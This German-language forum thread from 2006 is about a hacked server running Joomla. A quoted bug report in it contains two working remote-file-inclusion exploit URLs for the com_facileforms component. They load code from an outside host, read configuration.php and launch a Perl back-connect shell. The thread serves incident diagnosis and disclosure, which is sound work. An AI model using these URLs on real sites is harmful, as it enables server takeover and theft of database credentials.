Page 2 of 2
soweit durch
Posted: 2006-09-14 21:59
by fulltilt
Habe jetzt die ganze Kiste gründlich durchsucht und alles gelöscht was nicht gebraucht wird und suspekt war ...
Daten sind jetzt alle gesichert und nun werde ich morgen ein neues System aufsetzen. Bislang keine weiteren Attacken hoffe das es so bleibt. Ich könnte noch SSH dicht machen?
Ursache wohl entdeckt
Posted: 2006-09-14 22:54
by fulltilt
Folgenden Thread habe ich in einem Joomla Forum gefunden, trifft den Nagel auf den Kopf. Das Modul hatte in in einer Joomla Installation verwendet.
Code: Select all
Hi,
Posting with a bugmenot login because I don't personally use Joomla at all.
Description:
I suspect a bug in components/com_facileforms/facileforms.frame.php due to the fact that two different servers with sites running Joomla 1.0.10 got hacked (remote code inclusion) today.
Reported on:
Joomla 1.0.10
Classification:
Critical
Affected functions:
I don't know. Here's the exploit URLs:
Code:
/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.extremus.info/cmd/filed25.dat?&inclvar=ff_compath&o=/home/bandhosting.nl/www/configuration.php&
/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.extremus.info/cmd/tool25.dat?&list=1&cmd=cd%20/tmp;perl%20dc.pl%20123.123.123.123%208080
Related files:
components/com_facileforms/facileforms.frame.php
Steps to replicate:
Copy that url to an existing Joomla installation with register_globals=on
Analysis:
[Q&T] Confirmed/Unable to confirm/Rejected
Re: Hast recht
Posted: 2006-09-14 22:55
by rootsvr
fulltilt wrote:Hast recht mit dem manuellen Checks der Scripte ... Ich dachte halt wenn irgend ein Bot etwas auf den Server geladen hat - wohin auch immer ... ob das ein Virenscanner checkt?
Na ja - ich hatte bis vor 3 Stunden - 3 Joomla Portale drauf und wie gesagt damit hats angefangen - ist also nicht zu empfehlen.
Ansonsten laufen noch 2 Oscommerce Shops und eine Online Auktion PHPPROBID.
Ich tippe aber darauf das irgendein Joomla Modul das Problem ausgelöst hat. Ich werde dieses CMS wohl nicht mehr verwenden.
Die Kiste ist über 3 Jahre einwandfrei gelaufen ohne Ausfälle.
Ralph
Naja die Sicherheitslücke ist seit ein paar Wochen bekannt:
http://secunia.com/advisories/21636/
Hast nen Update vergessen, folglich bist Du daran schon selbst schuld.. immer fleissig nach Bugs Auschau halten.